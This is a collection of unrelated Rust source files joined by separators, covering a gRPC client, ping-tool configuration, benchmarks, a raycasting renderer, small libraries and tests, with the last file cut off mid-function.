use tonic::transport::Channel;
#[tokio::main]
async fn main() -> Result<(), Box<dyn std::error::Error>> {
let endpoints = ["http://[::1]:50051", "http://[::1]:50052"]
.iter()
.map(|a| Channel::from_static(a));
let channel = Channel::balance_list(endpoints);
let mut client = EchoClient::new(channel);
for _ in 0..12usize {
let request = tonic::Request::new(EchoRequest {
message: "hello".into(),
});
let response = client.unary_echo(request).await?;
println!("RESPONSE={:?}", response);
}
Ok(())
} |
use crate::{PingClientFactory, PingResultDto, PingResultProcessor, PortRangeList};
use std::fmt;
use std::fmt::Debug;
use std::net::{IpAddr, SocketAddr};
use std::str::FromStr;
use std::sync::{Arc, Mutex};
use std::{path::PathBuf, time::Duration};
pub const RNP_NAME: &str = "rnp";
pub const RNP_AUTHOR: &str = "r12f (r12f.com, github.com/r12f)";
pub const RNP_ABOUT: &str = "A simple layer 4 ping tool for cloud.";
#[derive(Debug, Clone, Ord, PartialOrd, Eq, PartialEq)]
pub enum RnpSupportedProtocol {
TCP,
QUIC,
External(String),
}
impl FromStr for RnpSupportedProtocol {
type Err = String;
fn from_str(input: &str) -> Result<RnpSupportedProtocol, Self::Err> {
match input.to_uppercase().as_str() {
"TCP" => Ok(RnpSupportedProtocol::TCP),
"QUIC" => Ok(RnpSupportedProtocol::QUIC),
_ => Err(String::from("Invalid protocol")),
}
}
}
impl fmt::Display for RnpSupportedProtocol {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
let protocol = match self {
RnpSupportedProtocol::TCP => "TCP",
RnpSupportedProtocol::QUIC => "QUIC",
RnpSupportedProtocol::External(p) => &p,
};
write!(f, "{}", protocol)
}
}
pub struct RnpPingConfig {
pub worker_config: PingWorkerConfig,
pub worker_scheduler_config: PingWorkerSchedulerConfig,
pub result_processor_config: PingResultProcessorConfig,
pub external_ping_client_factory: Option<PingClientFactory>,
pub extra_ping_result_processors: Vec<Box<dyn PingResultProcessor + Send + Sync>>,
}
impl Debug for RnpPingConfig {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
f.debug_struct("RnpCoreConfig")
.field("worker_config", &self.worker_config)
.field("worker_scheduler_config", &self.worker_scheduler_config)
.field("result_processor_config", &self.result_processor_config)
.field(
"external_ping_client_factory",
&if self.external_ping_client_factory.is_some() { "Some(PingClientFactory)".to_string() } else { "None".to_string() },
)
.field("extra_ping_result_processors", &self.extra_ping_result_processors.iter().map(|p| p.name()).collect::<Vec<&'static str>>())
.finish()
}
}
impl PartialEq for RnpPingConfig {
fn eq(&self, other: &RnpPingConfig) -> bool {
if self.worker_config != other.worker_config {
return false;
}
if self.worker_scheduler_config != other.worker_scheduler_config {
return false;
}
if self.result_processor_config != other.result_processor_config {
return false;
}
if self.external_ping_client_factory.is_some() != other.external_ping_client_factory.is_some() {
return false;
}
let matching_processor_count =
self.extra_ping_result_processors.iter().zip(other.extra_ping_result_processors.iter()).filter(|&(a, b)| a.name() == b.name()).count();
return matching_processor_count == self.extra_ping_result_processors.len()
&& matching_processor_count == other.extra_ping_result_processors.len();
}
}
#[derive(Debug, Clone, PartialEq)]
pub struct PingWorkerConfig {
pub protocol: RnpSupportedProtocol,
pub target: SocketAddr,
pub source_ip: IpAddr,
pub ping_interval: Duration,
pub ping_client_config: PingClientConfig,
}
#[derive(Debug, Clone, PartialEq)]
pub struct PingClientConfig {
pub wait_timeout: Duration,
pub time_to_live: Option<u32>,
pub check_disconnect: bool,
pub server_name: Option<String>,
pub log_tls_key: bool,
pub alpn_protocol: Option<String>,
pub use_timer_rtt: bool,
}
#[derive(Debug, Clone, PartialEq)]
pub struct PingWorkerSchedulerConfig {
pub source_ports: PortRangeList,
pub ping_count: Option<u32>,
pub warmup_count: u32,
pub parallel_ping_count: u32,
}
#[derive(Debug, Clone, PartialEq)]
pub struct PingResultProcessorCommonConfig {
pub quiet_level: i32,
}
pub const RNP_QUIET_LEVEL_NONE: i32 = 0;
pub const RNP_QUIET_LEVEL_NO_PING_RESULT: i32 = 1;
pub const RNP_QUIET_LEVEL_NO_PING_SUMMARY: i32 = 2;
pub const RNP_QUIET_LEVEL_NO_OUTPUT: i32 = 3;
#[derive(Debug, Clone)]
pub struct PingResultProcessorConfig {
pub common_config: PingResultProcessorCommonConfig,
pub exit_on_fail: bool,
pub exit_failure_reason: Option<Arc<Mutex<Option<PingResultDto>>>>,
pub csv_log_path: Option<PathBuf>,
pub json_log_path: Option<PathBuf>,
pub text_log_path: Option<PathBuf>,
pub show_result_scatter: bool,
pub show_latency_scatter: bool,
pub latency_buckets: Option<Vec<f64>>,
}
impl PartialEq for PingResultProcessorConfig {
fn eq(&self, other: &PingResultProcessorConfig) -> bool {
if self.common_config != other.common_config {
return false;
}
if self.exit_on_fail != other.exit_on_fail {
return false;
}
if self.exit_failure_reason.is_some() != other.exit_failure_reason.is_some() {
return false;
}
if self.csv_log_path != other.csv_log_path {
return false;
}
if self.json_log_path != other.json_log_path {
return false;
}
if self.text_log_path != other.text_log_path {
return false;
}
if self.show_result_scatter != other.show_result_scatter {
return false;
}
if self.show_latency_scatter != other.show_latency_scatter {
return false;
}
if self.latency_buckets != other.latency_buckets {
return false;
}
return true;
}
}
#[derive(Debug, Clone, PartialEq)]
pub struct RnpStubServerConfig {
pub protocol: RnpSupportedProtocol,
pub server_address: SocketAddr,
pub sleep_before_write: Duration,
pub write_chunk_size: usize,
pub report_interval: Duration,
}
|
impl Solution {
pub fn decode(encoded: Vec<i32>, first: i32) -> Vec<i32> {
let n = encoded.len() + 1;
let mut res = vec![0;n];
res[0] = first;
for i in 1..n{
res[i] = res[i - 1] ^ encoded[i - 1];
}
res
}
} |
use error::*;
use serde_json;
use serialization::Module;
use std::fs::File;
use std::io::Read;
use std::path::Path;
pub fn file_from_path<TPath>(path: TPath) -> Result<File>
where TPath: AsRef<Path> {
let path = path.as_ref();
File::open(path)
.map_err(|err| Error::from(ErrorKind::IoError(err)))
.chain_err(|| ErrorKind::FileFromPathFailure(path.to_path_buf()))
}
pub fn module_from_path<TPath>(path: TPath) -> Result<Module>
where TPath: AsRef<Path> {
let file = try!(file_from_path(path));
let text = try!(text_from_file(file));
module_from_text(text)
}
pub fn module_from_text(text: String) -> Result<Module> {
serde_json::from_str::<Module>(&text)
.map_err(|err| Error::from(ErrorKind::SerdeJsonError(err)))
.chain_err(|| ErrorKind::PluginDeserializationFailure(text))
}
pub fn text_from_file(mut file: File) -> Result<String> {
let mut result = String::new();
match file.read_to_string(&mut result) {
Err(err) => {
Err(Error::from(ErrorKind::IoError(err))).chain_err(|| ErrorKind::TextFromFileFailure(file))
},
Ok(_) => {
Ok(result)
},
}
}
|
use caolo_sim::tables::{btree_table::BTreeTable, page_table::PageTable, JoinIterator};
use caolo_sim::{indices::EntityId, tables::flag_table::SparseFlagTable};
use criterion::{black_box, criterion_group, Criterion};
use rand::{rngs::SmallRng, Rng, SeedableRng};
use serde::{Deserialize, Serialize};
fn get_rand() -> impl rand::Rng {
SmallRng::seed_from_u64(0xdeadbeef)
}
#[derive(Default, Debug, Clone, Serialize, Deserialize)]
struct Flag {}
#[derive(Default, Debug, Clone, Serialize, Deserialize)]
struct LargeComponent {
_a: [u8; 10],
_b: [u8; 10],
_c: [u8; 10],
_d: [u8; 10],
_e: [u8; 10],
_f: [u8; 10],
}
fn random_vec_table(len: usize, domain: u32) -> PageTable<LargeComponent> {
let mut rng = get_rand();
let mut table = PageTable::new(domain as usize);
for _ in 0..len {
let mut res = false;
while !res {
let id = EntityId::new(rng.gen_range(0..=domain), 0);
res = table.insert(id, LargeComponent::default()).is_none();
}
}
table
}
fn random_bt_table(len: usize, domain: u32) -> BTreeTable<EntityId, LargeComponent> {
let mut rng = get_rand();
let mut table = BTreeTable::new();
for _ in 0..len {
let mut res = false;
while !res {
let id = EntityId::new(rng.gen_range(0..=domain), 0);
res = table.insert(id, LargeComponent::default()).is_none();
}
}
table
}
fn join_vec_btree_2pow15_sparse(c: &mut Criterion) {
c.bench_function("join_vec_btree_2pow15_sparse", |b| {
let bt = random_bt_table(1 << 15, 1 << 16);
let ve = random_vec_table(1 << 15, 1 << 16);
b.iter(move || {
let it = JoinIterator::new(ve.iter(), bt.iter());
for joined in it {
black_box(joined);
}
});
});
}
fn join_btree_vec_2pow15_sparse(c: &mut Criterion) {
c.bench_function("join_btree_vec_2pow15_sparse", |b| {
let bt = random_bt_table(1 << 15, 1 << 16);
let ve = random_vec_table(1 << 15, 1 << 16);
b.iter(move || {
let it = JoinIterator::new(bt.iter(), ve.iter());
for joined in it {
black_box(joined);
}
});
});
}
fn join_vec_vec_2pow15_sparse(c: &mut Criterion) {
c.bench_function("join_vec_vec_2pow15_sparse", |b| {
let ta = random_vec_table(1 << 15, 1 << 16);
let tb = random_vec_table(1 << 15, 1 << 16);
b.iter(move || {
let it = JoinIterator::new(tb.iter(), ta.iter());
for joined in it {
black_box(joined);
}
});
});
}
fn join_bt_bt_2pow15_sparse(c: &mut Criterion) {
c.bench_function("join_bt_bt_2pow15_sparse", |b| {
let ta = random_bt_table(1 << 15, 1 << 16);
let tb = random_bt_table(1 << 15, 1 << 16);
b.iter(move || {
let it = JoinIterator::new(tb.iter(), ta.iter());
for joined in it {
black_box(joined);
}
});
});
}
fn join_vec_btree_2pow15_dense(c: &mut Criterion) {
c.bench_function("join_vec_btree_2pow15_dense", |b| {
let bt = random_bt_table(1 << 15, 1 << 15);
let ve = random_vec_table(1 << 15, 1 << 15);
b.iter(move || {
let it = JoinIterator::new(ve.iter(), bt.iter());
for joined in it {
black_box(joined);
}
});
});
}
fn join_btree_vec_2pow15_dense(c: &mut Criterion) {
c.bench_function("join_btree_vec_2pow15_dense", |b| {
let bt = random_bt_table(1 << 15, 1 << 15);
let ve = random_vec_table(1 << 15, 1 << 15);
b.iter(move || {
let it = JoinIterator::new(bt.iter(), ve.iter());
for joined in it {
black_box(joined);
}
});
});
}
fn join_vec_vec_2pow15_dense(c: &mut Criterion) {
c.bench_function("join_vec_vec_2pow15_dense", |b| {
let ta = random_vec_table(1 << 15, 1 << 15);
let tb = random_vec_table(1 << 15, 1 << 15);
b.iter(move || {
let it = JoinIterator::new(tb.iter(), ta.iter());
for joined in it {
black_box(joined);
}
});
});
}
fn join_bt_bt_2pow15_dense(c: &mut Criterion) {
c.bench_function("join_bt_bt_2pow15_dense", |b| {
let ta = random_bt_table(1 << 15, 1 << 15);
let tb = random_bt_table(1 << 15, 1 << 15);
b.iter(move || {
let it = JoinIterator::new(tb.iter(), ta.iter());
for joined in it {
black_box(joined);
}
});
});
}
fn join_flag_vec_sparse(c: &mut Criterion) {
c.bench_function("join_flag_vec", |b| {
let vectable = random_vec_table(1 << 12, 1 << 15);
let mut flags = SparseFlagTable::<_, Flag>::default();
for (id, _) in vectable.iter() {
flags.insert(id);
}
b.iter(move || {
let it = JoinIterator::new(flags.iter(), vectable.iter());
for joined in it {
black_box(joined);
}
});
});
}
criterion_group!(
join_benches,
join_bt_bt_2pow15_dense,
join_vec_vec_2pow15_dense,
join_btree_vec_2pow15_dense,
join_bt_bt_2pow15_dense,
join_vec_btree_2pow15_dense,
join_vec_vec_2pow15_sparse,
join_btree_vec_2pow15_sparse,
join_vec_btree_2pow15_sparse,
join_bt_bt_2pow15_sparse,
join_flag_vec_sparse
);
|
use datadog_logs::{
client::HttpDataDogClient,
config::DataDogConfig,
logger::{DataDogLogLevel, DataDogLogger},
};
#[test]
fn test_logger_stops_http() {
let config = DataDogConfig::default();
let client = HttpDataDogClient::new(&config).unwrap();
let logger = DataDogLogger::blocking::<HttpDataDogClient>(client, config);
logger.log("message", DataDogLogLevel::Alert);
// it should hang forever if logging loop does not break
std::mem::drop(logger);
}
#[tokio::test]
async fn test_async_logger_stops_http() {
let config = DataDogConfig::default();
let client = HttpDataDogClient::new(&config).unwrap();
let (logger, future) = DataDogLogger::non_blocking_cold::<HttpDataDogClient>(client, config);
tokio::spawn(future);
logger.log("message", DataDogLogLevel::Alert);
// it should hang forever if logging loop does not break
std::mem::drop(logger);
}
|
use hacspec_lib::*;
array!(Block, 8, U32);
pub fn shuffle(b: Block) -> Block {
let mut b = b;
let b1: U32 = b[1];
b[0] += b1;
b
}
|
/// Short form to compose Error values.
///
/// Here are few possible ways:
///
/// ```ignore
/// use crate::Error;
/// err_at!(Error::Invalid(String::default(), "bad argument"));
/// ```
///
/// ```ignore
/// use crate::Error;
/// err_at!(Invalid, msg: format!("bad argument"));
/// ```
///
/// ```ignore
/// use crate::Error;
/// err_at!(Invalid, std::io::read(buf));
/// ```
///
/// ```ignore
/// use crate::Error;
/// err_at!(Invalid, std::fs::read(file_path), format!("read failed"));
/// ```
///
#[macro_export]
macro_rules! err_at {
($e:expr) => {{
use Error::*;
let p = format!("{}:{}", file!(), line!());
match $e {
Ok(val) => Ok(val),
Err(Fatal(_, s)) => Err(Fatal(p, s)),
Err(Invalid(_, s)) => Err(Invalid(p, s)),
Err(IOError(_, s)) => Err(IOError(p, s)),
Err(Parse(_, s)) => Err(Parse(p, s)),
}
}};
($v:ident, msg:$m:expr) => {{
let prefix = format!("{}:{}", file!(), line!());
Err(Error::$v(prefix, format!("{}", $m)))
}};
($v:ident, $e:expr) => {
match $e {
Ok(val) => Ok(val),
Err(err) => {
let prefix = format!("{}:{}", file!(), line!());
Err(Error::$v(prefix, format!("{}", err)))
}
}
};
($v:ident, $e:expr, $m:expr) => {
match $e {
Ok(val) => Ok(val),
Err(err) => {
let prefix = format!("{}:{}", file!(), line!());
Err(Error::$v(prefix, format!("{} {}", $m, err)))
}
}
};
}
|
extern crate hyper;
extern crate rustc_serialize;
extern crate bbs;
use std::io::Read;
use std::net::TcpListener;
use hyper::Client;
use hyper::header::UserAgent;
use hyper::server::{Server, Request, Response};
use bbs::{BOT_ADDR, HTML_ADDR};
use bbs::UserClient;
use bbs::Message;
use rustc_serialize::json;
/// get post from server
fn req_handler(mut req: Request, mut res: Response) {
if req.method != hyper::Post {
return
}
let mut buf = String::new();
req.read_to_string(&mut buf).unwrap();
let vec: Vec<&str> = buf.split(" ").collect();
if vec[0] != "choose" {
return
}
let mut numbers: Vec<i32> = Vec::new();
for i in &vec {
if i.to_string() != "choose" {
numbers.push(i.parse::<i32>().unwrap());
}
}
let choosed_number = choose(numbers);
send_to_server(choosed_number);
}
fn choose(numbers: Vec<i32>) -> String {
let rand_client: Client = hyper::Client::new();
let url = "https://www.random.org/integers/?num=1&min=1&max=".to_string() + &numbers.len().to_string()
+ "&col=1&base=10&format=plain&rnd=new";
let mut response = rand_client.get(&url).send().unwrap();
let mut buf = String::new();
response.read_to_string(&mut buf).unwrap();
// println!("string={}", buf);
let new_line = buf.len() - 1;
buf.truncate(new_line);
let idx = buf.parse::<i32>().unwrap() - 1;
return numbers[idx as usize].to_string();
}
fn send_to_server(number: String) {
println!("send number {} to server", number);
let client = UserClient::new("bot".to_string(), HTML_ADDR.to_string());
client.send_msg(number);
}
fn main() {
// Create a bot user.
// TODO
// Start TcpListener.
// TODO
println!("Listening on {}.", BOT_ADDR);
match Server::http(BOT_ADDR) {
Ok(server) => match server.handle(req_handler) {
Ok(_) => (),
Err(e) => println!("server.hanle error: {:?}", e),
},
Err(e) => println!("Server::http error: {:?}", e),
}
// Listen for incoming TCP connections.
// For each connection, accept it and read all data from the stream.
// If it's a 'choose' message, post to the BBS with a response (via the above bot user).
// TODO
}
#[cfg(test)]
mod test {
#[test]
fn test_choose() {
let a = vec![123, 21, 3133, 23, 32, 42123];
println!("{}", super::choose(a));
}
#[test]
fn test_convert() {
let mut my_string = "2\n".to_string();
let int_vec = String::new();
// for i in &my_string {
// if i >= "0" && i <= "9" {
// int_vec = int_vec + &i;
// }
// }
let new_len = my_string.len()-1;
my_string.truncate(new_len);
let my_int = my_string.parse::<i32>().unwrap();
println!("{}", my_int);
}
#[test]
fn test_send_to_server() {
super::send_to_server("10".to_string());
}
} |
#![feature(test)]
#[cfg(test)]
extern crate test;
#[macro_use]
extern crate derive_new;
pub mod board;
|
use rand::{SeedableRng, Rng};
use crate::game_plugin::{Position, Rotation};
use crate::texture::{Drawable, Texture};
use crate::util;
use crate::TILE_SIZE;
pub fn raycast(
projection_plane: (i32, i32),
fov: i32,
position: &Position,
rotation: &Rotation,
pixels: &mut [u8],
wall_texture: &Texture,
floor_texture: &Texture,
map: &Map,
) -> Result<(), String> {
let half_fov = Rotation::new(fov as f32 / 2.0);
let fov = Rotation::new(fov as f32);
let mut rng = rand::rngs::SmallRng::from_entropy();
// using the formula tan(angle) = opposite / adjacent
// We know the angle, because that's FOV/2
// We know opposite, because that's projection's plane width / 2
let distance_to_plane = (projection_plane.0 / 2) as f32 / half_fov.tan();
// The angle increment between rays is known by the fov. ie, how many steps would you need to fit the plane.
let degrees_per_iteration = fov.degrees() / projection_plane.0 as f32;
// The starting angle is the viewing angle rotated minus half the fov.
// \ | /
// \ | /
// º\|/
// º p--------
// ºººº
let mut ray_rotation = rotation.rotated(-half_fov.degrees());
let tile_size = TILE_SIZE as f32;
for x in 0..projection_plane.0 {
let horizontal_distance = if ray_rotation.is_straight_horizontal() {
(IntersectionPoint::default(), f32::MAX)
} else {
look_for_horizontal(&ray_rotation, position, &map)?
};
let vertical_distance = if ray_rotation.is_straight_vertical() {
(IntersectionPoint::default(), f32::MAX)
} else {
look_for_vertical(&ray_rotation, position, &map)?
};
// Drawing some debug lines for the rays
/*
canvas.set_draw_color((20, 50, 20));
let ray_dir = ray_rotation.direction() * 5.0;
let some_distance_away = (position.x + ray_dir.x, position.y + ray_dir.y);
canvas.draw_line(
(position.x.floor() as i32, position.y.floor() as i32),
(
some_distance_away.0.floor() as i32,
some_distance_away.1.floor() as i32,
),
)?;
*/
// Kay, draw the walls now if we hit something
let ((intersection, closest_hit), side) = if horizontal_distance.1 < vertical_distance.1 {
(horizontal_distance, 'h')
} else {
(vertical_distance, 'v')
};
if closest_hit != f32::MAX {
let distance_to_wall =
closest_hit * (ray_rotation.radians() - rotation.radians()).cos();
let projected_height =
(tile_size / distance_to_wall * distance_to_plane).floor() as i32;
let mid_point = projection_plane.1 / 2;
let wall_bottom = mid_point + projected_height / 2;
let wall_top = mid_point - projected_height / 2;
// Draw fill color of walls
/*
let color =
(if side == 'v' { 750.0 } else { 450.0 } * (1.0 / distance_to_wall.sqrt())) as u8;
canvas.set_draw_color((color, color, color));
canvas.draw_line((x, wall_top), (x, wall_bottom - 2))?;
*/
// Draw wall texture
let wall_x = if side == 'h' {
intersection.x
} else {
intersection.y
};
let tex_x = ((wall_x / tile_size).fract() * wall_texture.width() as f32) as i32;
let dst_to_light = map.distance_to_light(intersection.x, intersection.y, Some(&mut rng), side);
let light_mult = light_intensity(dst_to_light);
let mult = 1. / distance_to_wall + light_mult;
// So dark we don't need to copy anything
if mult > 0.00 {
wall_texture.draw_strip_at_ex(
x,
tex_x,
wall_top,
wall_bottom,
pixels,
Some(&[mult, mult, mult]),
);
}
let angle = rotation.rotated(-ray_rotation.degrees());
floorcast(
x,
wall_bottom..projection_plane.1,
&position,
&ray_rotation,
angle.clone(),
distance_to_plane,
projection_plane,
pixels,
floor_texture,
'f',
&map,
&mut rng,
)?;
floorcast(
x,
0..wall_top,
&position,
&ray_rotation,
angle,
distance_to_plane,
projection_plane,
pixels,
floor_texture,
'c',
&map,
&mut rng,
)?;
}
// Done, next angle
ray_rotation.add(degrees_per_iteration);
}
Ok(())
}
// Looks for horizontal grid lines
// ============= <-
// | | | | |
// ============= <- these
// | | | | |
// ============= <-
fn look_for_horizontal(
ray_rotation: &Rotation,
position: &Position,
map: &Map,
) -> Result<(IntersectionPoint, f32), String> {
let tile_size = TILE_SIZE as f32;
// Define the first intersection
let mut intersection = {
// The Y of the first intersection is going to be player_position_y / tile_size. And we add one tile_size to that if looking down
let mut first_y = (position.y / tile_size).floor() * tile_size;
let mut mod_y = 0;
if !ray_rotation.is_facing_up() {
first_y += tile_size;
} else {
mod_y -= 1;
}
let first_x = position.x + (position.y - first_y) / -ray_rotation.tan();
IntersectionPoint::new(first_x, first_y, 0, mod_y, TILE_SIZE)
};
Ok(step_ray(
position,
&mut intersection,
&ray_rotation,
'h',
map,
0,
))
}
// Looks for vertical grid lines
// ‖--‖--‖--‖--‖
// ‖ ‖ ‖ ‖ ‖
// ‖--‖--‖--‖--‖
// ‖ ‖ ‖ ‖ ‖
// ‖--‖--‖--‖--‖
// ^ ^ ^ ^ ^
// |
// these
fn look_for_vertical(
ray_rotation: &Rotation,
position: &Position,
map: &Map,
) -> Result<(IntersectionPoint, f32), String> {
let tile_size = TILE_SIZE as f32;
// Define the first intersection
let mut intersection = {
// We know the first_x that will be hit because it's
// the next (or previous) grid line from player position
let mut first_x = (position.x / tile_size).floor() * tile_size;
let mut mod_x = 0;
if !ray_rotation.is_facing_left() {
// And if the ray is going right, then it's the next grid line
first_x += tile_size;
} else {
// Otherwise it's in the same position but it needs to check the grid to the left
mod_x -= 1;
}
// tan(θ) = opposite/adjacent
let first_y = position.y + (position.x - first_x) * -ray_rotation.tan();
IntersectionPoint::new(first_x, first_y, mod_x, 0, TILE_SIZE)
};
Ok(step_ray(
position,
&mut intersection,
&ray_rotation,
'v',
map,
0,
))
}
fn step_ray(
position: &Position, // From
intersection: &mut IntersectionPoint, // To
ray_rotation: &Rotation,
side: char,
map: &Map,
n: i32,
) -> (IntersectionPoint, f32) {
let tile_size = TILE_SIZE as f32;
if map.is_blocking_at(intersection.as_grid_pair()) {
return (
*intersection,
(position.y - intersection.y).hypot(position.x - intersection.x),
);
}
let (distance_to_next_x, distance_to_next_y) = if side == 'v' {
let distance_to_next_x = if ray_rotation.is_facing_left() {
-tile_size
} else {
tile_size
};
(distance_to_next_x, distance_to_next_x * ray_rotation.tan())
} else {
let distance_to_next_y = if ray_rotation.is_facing_up() {
-tile_size
} else {
tile_size
};
(distance_to_next_y / ray_rotation.tan(), distance_to_next_y)
};
if n > 250 {
return (*intersection, f32::MAX);
}
let nextx = intersection.x + distance_to_next_x;
let nexty = intersection.y + distance_to_next_y;
step_ray(
position,
&mut IntersectionPoint::new(
nextx,
nexty,
intersection.mod_x,
intersection.mod_y,
TILE_SIZE,
),
ray_rotation,
side,
map,
n + 1,
)
}
#[derive(Debug, Clone, Copy, PartialEq)]
struct IntersectionPoint {
pub x: f32,
pub y: f32,
pub mod_x: i32, // Which grid does this point belong to.
pub mod_y: i32,
grid_size: f32,
}
impl IntersectionPoint {
pub fn new(x: f32, y: f32, mod_x: i32, mod_y: i32, grid_size: i32) -> IntersectionPoint {
IntersectionPoint {
x,
y,
mod_x,
mod_y,
grid_size: grid_size as f32,
}
}
pub fn as_grid_pair(&self) -> (i32, i32) {
(
(self.x / self.grid_size).floor() as i32 + self.mod_x,
(self.y / self.grid_size).floor() as i32 + self.mod_y,
)
}
}
impl Default for IntersectionPoint {
fn default() -> IntersectionPoint {
IntersectionPoint {
x: 0.0,
y: 0.0,
mod_x: 0,
mod_y: 0,
grid_size: 0.0,
}
}
}
pub struct Map {
tiles: Vec<char>,
width: i32,
height: i32,
lights: Vec<(i32, i32)>,
light_data: Vec<Option<(i32, i32)>>,
}
impl Map {
pub fn new() -> Map {
let mut map = Map {
tiles: r#"
##################
#.............####
#..............###
#.............####
#.............####
#.............####
#..............###
#..............###
#......#.......###
#.....#..#.....###
#........#.....###
#...##.#####...###
#...#..........###
#......l..#....###
#...##....#....###
#...####..#....###
#.........#....###
##################
"#
.to_owned()
.replace('\n', "")
.replace(' ', "")
.chars()
.collect(),
width: 18,
height: 18,
lights: Vec::new(),
light_data: Vec::new(),
};
map.bake_lights();
map
}
// Finds the closest light source for every tile on map
fn bake_lights(&mut self) {
self.lights.clear();
for (i, t) in self.tiles.iter().enumerate() {
if *t == 'l' {
let x = (i as i32 % self.width) * TILE_SIZE;
let y = (i as i32 / self.width) * TILE_SIZE;
self.lights
.push((x, y));
}
}
let total_width = self.width * TILE_SIZE;
let mut light_data = vec![None; (self.width * self.height * TILE_SIZE * TILE_SIZE) as usize];
for x in 0..total_width {
for y in 0..self.height * TILE_SIZE {
let light_pos = self.prepare_light_data(x, y);
light_data[(total_width * y + x) as usize] = light_pos;
}
}
self.light_data = light_data;
}
fn is_blocking_at(&self, (x, y): (i32, i32)) -> bool {
let given_idx = (self.width * y + x) as usize;
if y > self.height || x > self.width || given_idx >= self.tiles.len() {
return false;
}
self.tiles[given_idx] == '#'
}
fn prepare_light_data(&self, x: i32, y: i32) -> Option<(i32, i32)> {
let mut closest = None;
for (lx, ly) in &self.lights {
let dst = if let Some(_) =
crate::util::raycast((x as i32, y as i32), (*lx as i32, *ly as i32), |point| {
let x_diff = (point.0 - x).abs();
let y_diff = (point.1 - y).abs();
if x_diff < 2 && y_diff < 2 { return false; }
self.is_blocking_at((point.0 / TILE_SIZE, point.1 / TILE_SIZE))
}) {
f32::MAX
} else {
let x = ((x - lx) as f32).abs();
let y = ((y - ly) as f32).abs();
x.hypot(y)
};
if let Some((c, _)) = closest {
if dst < c {
closest = Some((dst, (*lx, *ly)));
}
} else {
closest = Some((dst, (*lx, *ly)));
}
}
if let Some(closest) = closest {
if closest.0 == f32::MAX {
return None;
}
Some(closest.1)
} else {
None
}
}
pub fn distance_to_light(&self, x: f32, y: f32, rng: Option<&mut rand::rngs::SmallRng>, side: char) -> Option<f32> {
let gx = x.round() as i32;
let gy = y.round() as i32;
let idx = (self.width * TILE_SIZE * gy + gx) as usize;
if idx >= self.light_data.len() {
return None;
}
let tile_size = TILE_SIZE as f32;
if let Some((lx, ly)) = self.light_data[idx] {
let dither = if let Some(rng) = rng {
if side == 'c' || side == 'f' {
rng.gen_range(1.,18.)
} else {
rng.gen_range(1.,2.)
}
} else {
0.0
};
let sign = if side == 'h' {
(gx - ly).signum()
} else {
(gy - lx).signum()
} as f32;
let (lx, ly) = (
lx as f32 + if side == 'h' { dither * sign } else { 0. },
ly as f32 + if side == 'v' { dither * sign } else { 0. },
);
let dst = (lx - x).abs().hypot((ly - y).abs());
return Some(dst + if side == 'c' || side == 'f' { dither } else { 0.0 });
}
None
}
}
const PLAYER_HEIGHT: i32 = TILE_SIZE / 2;
fn floorcast(
x: i32,
range: std::ops::Range<i32>,
player: &Position,
ray: &Rotation,
angle: Rotation,
distance_to_plane: f32,
projection_plane: (i32, i32),
pixels: &mut [u8],
floor_texture: &Texture,
side: char,
map: &Map,
rng: &mut rand::rngs::SmallRng,
) -> Result<(), String> {
let projection_center = projection_plane.1 / 2;
let tile_size = TILE_SIZE as f32;
for row in range {
let bheight = if side == 'f' {
row - projection_center
} else {
projection_center - row
};
let straight_distance =
(PLAYER_HEIGHT as f32 / (bheight) as f32) * distance_to_plane as f32;
let distance_to_point = straight_distance / angle.cos();
let ends = (
distance_to_point * ray.cos() + player.x,
distance_to_point * ray.sin() + player.y,
);
let tex_x = ((ends.0 / tile_size).fract() * floor_texture.width() as f32) as i32;
let tex_y = ((ends.1 / tile_size).fract() * floor_texture.height() as f32) as i32;
let distance_to_light = map.distance_to_light(ends.0, ends.1, Some(rng), side);
let light_mult = light_intensity(distance_to_light);
if light_mult < 0.08 {
// light_mult = 0.;
}
let mult = 1. / distance_to_point + light_mult;
// So dark we don't need to copy anything
if mult < 0.005 {
// continue;
}
floor_texture.copy_to_ex(tex_x, tex_y, x, row, pixels, Some(&[mult, mult, mult]));
}
Ok(())
}
fn light_intensity(dtl: Option<f32>) -> f32 {
let intensity = if let Some(dtl) = dtl {
let rounded = util::round_n(dtl, (TILE_SIZE / 2) as f32);
(1.0 / rounded.powf(if dtl < 60. {
0.95
} else if dtl > 100. {
2.
} else {
1.15
}))
.sqrt()
} else {
0.0
};
intensity.min(1.15)
}
|
//! # Score Four Library for Rust
//! This is a simple Score Four board library for Rust.
//!
//! ## Example
//! ```
//! extern crate score_four;
//! use score_four::{Board, BoardStatus};
//!
//! let mut board = Board::new();
//! board.put(0); // put a bead in (0, 0) position
//! assert_eq!(board.status(), BoardStatus::Ongoing);
//! ```
//!
extern crate rand;
mod bitboard;
pub use crate::bitboard::{BitBoard, EMPTY};
mod color;
pub use crate::color::{Color, NUM_COLORS};
mod board;
pub use crate::board::{Board, BoardStatus};
mod action;
pub use crate::action::Action;
mod player;
pub use crate::player::{Player, PlayerMC, PlayerRandom};
mod organizer;
pub use crate::organizer::Organizer;
|
use std::process::Command;
#[tokio::main]
async fn main() -> std::io::Result<()> {
let mut cmd_str = String::from("default");
if cfg!(target_os = "linux") {
cmd_str = "telnet".to_string();
}
let output = Command::new("gnome-terminal").arg("--")
.arg("telnet")
.arg("localhost")
.arg("8080")
.output().expect("cmd exec error!");
let output_str = String::from_utf8_lossy(&output.stdout);
println!("{}",output_str);
Ok(())
} |
use apllodb_sql_parser::apllodb_ast;
use apllodb_shared_components::BinaryOperator;
use super::AstTranslator;
impl AstTranslator {
pub(crate) fn binary_operator(
ast_binary_operator: apllodb_ast::BinaryOperator,
) -> BinaryOperator {
match ast_binary_operator {
apllodb_ast::BinaryOperator::Equal => BinaryOperator::Equal,
}
}
}
|
extern crate sdl2;
use sdl2::pixels::Color;
// #[macro_use] asks the compiler to import the macros defined in the `events`
// module. This is necessary because macros cannot be namespaced -- macro
// expansion happens before the concept of namespace even starts to _exist_ in
// the compilation timeline.
#[macro_use]
mod events;
// list of the keyboard events we're interested in.
// See events.rs for the macro definition.
struct_events! {
keyboard: {
key_escape: Escape
},
else: {
quit: Quit { .. }
}
}
use sdl2::render::Renderer;
/// Bundles the Phi abstractions in a single structure which
/// can be passed easily between functions.
pub struct Phi<'window> {
pub events: Events,
pub renderer: Renderer<'window>,
}
pub enum ViewAction {
None,
Quit,
}
pub trait View {
fn render(&mut self, context: &mut Phi, elapsed: f64) -> ViewAction;
}
fn main() {
println!("Hello, world!");
